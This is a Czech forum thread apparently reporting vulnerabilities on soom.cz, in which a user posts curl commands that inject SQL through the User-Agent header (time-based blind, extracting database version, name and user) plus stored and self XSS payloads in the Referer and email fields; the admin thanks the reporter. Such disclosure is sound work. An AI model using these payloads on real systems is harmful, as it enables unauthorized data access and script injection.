SQL injection na soom.cz

BugTrack

SQL injection na soom.cz#
SQL injection v projektu GET2MAIL

Jedna se o boolean time based blind, neni osetren user agent a seznam pristupu vraci true/false.

curl '[link] -H $'User-Agent: sql\' OR sleep(10) OR \'1\'=\'1'

version()
5.1.73-1%

curl '[link] -H $'User-Agent: sql\' or version() like \'5.1.73-1%\' AND \'1\'=\'1'

database()
soom_cz

curl '[link] -H $'User-Agent: sql\' or database()=\'soom_cz\' AND \'1\'=\'1'

user()
soom_cz_localhost%

curl '[link] -H $'User-Agent: sql\' or user() like \'soom_cz_localhost%\' AND \'1\'=\'1'

Zaroven je v seznamu pristupu stored XSS v poli referer:

curl '[link] --referer 'javascript:alert(1)'

Jeste by bylo fajn opravit regex pro overovani emailu v uzivatelskem profilu. Je mozne ulozit nasledujici email:
xss"><img src=x onerror=alert(1)>xss@soom.cz

a vyvolat self XSS pri pridavani inzeratu v bazaru.
(odpovědět)
Sinxteniyn | 192.42.116.*24.3.2017 14:36
re: SQL injection na soom.cz#
Sinxteniyn: Díky! Snad je to již OK. Věřím ale, že ty určitě ještě něco najdeš :)

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP24.3.2017 17:57
re: SQL injection na soom.cz#
Neverim, ze tohle delal manualne ... to by tech requestu v curl vypalil peknou sadu, nez by tu "slepotu" nasel :D
(odpovědět)
vspqq | 82.117.146.*27.4.2017 17:35

Zpět
 
 
 

 
BBCode